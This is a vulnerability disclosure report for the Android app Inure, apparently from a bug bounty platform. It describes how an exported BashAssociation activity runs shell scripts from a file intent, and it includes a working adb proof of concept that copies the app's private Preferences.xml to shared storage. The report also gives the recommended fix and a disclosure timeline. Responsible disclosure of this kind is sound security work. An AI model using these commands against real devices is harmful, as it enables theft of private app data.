Theft of Arbitrary Files due to execution of attacker scripts from BashAssociation.kt in hamza417/inure


Reported on

Aug 13th 2023


Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation) which accepted intent data via the file scheme + text/x-shellscript mime type and executed the commands contained within those opened files via


Since this activity is exported, it is possible for an installed malicious application to send an intent to this activity in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application's internal directory (/data/data/app.simple.inure/) and exfiltrate it into /sdcard where the attacker could read the retrieved information.

Proof of Concept

  1. Setup a directory on the sdcard
PS C:\Users\Acer> adb shell  
angelica:/ $ cd /sdcard  
angelica:/sdcard $ mkdir inure-proof-of-concept  
angelica:/sdcard $ cd inure-proof-of-concept/  
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" >  
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 10  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32
  1. Perform the attack via an adb command:
PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/" -n app.simple.inure/.activities.association.BashAssociation  
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/ cmp=app.simple.inure/.activities.association.BashAssociation }
  1. Review the files on the directory we created in step 1, we can see that the Preferences.xml file was exfiltrated:
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 14  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32  
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml  
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<int name="main_app_launch_count" value="5" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app  
.simple.inure.activities.association.BashAssociation}: /sdcard/inure-proof-of-concept/inu open failed: ENOENT (No such file or directory)</string>  
<long name="crash_timestamp" value="1691896905717" />  
<boolean name="deep_search_keyword_mode" value="false" />  


An application's internal directory and the files within it should never be accessible by other applications within a device. The vulnerability reported demonstrates that it is possible for malicious third-party applications to steal data belonging to the Inure app's private directory through the execution of malicious bash scripts. A recommended fix would be to set the exported attribute of the activity to false, or to apply the inure.terminal.permission.RUN_SCRIPT permission on the affected functionality.

We are processing your report and will contact the hamza417/inure team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a a month ago
We have contacted a member of the hamza417/inure team and are waiting to hear back a month ago
Hamza Rizwan validated this vulnerability a month ago
Carlo Jae Avila has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hamza Rizwan gave praise a month ago
Thanks for this one too
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Hamza Rizwan marked this as fixed in build88 with commit e74062 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Aug 20th 2023
Hamza Rizwan published this vulnerability a month ago
to join this conversation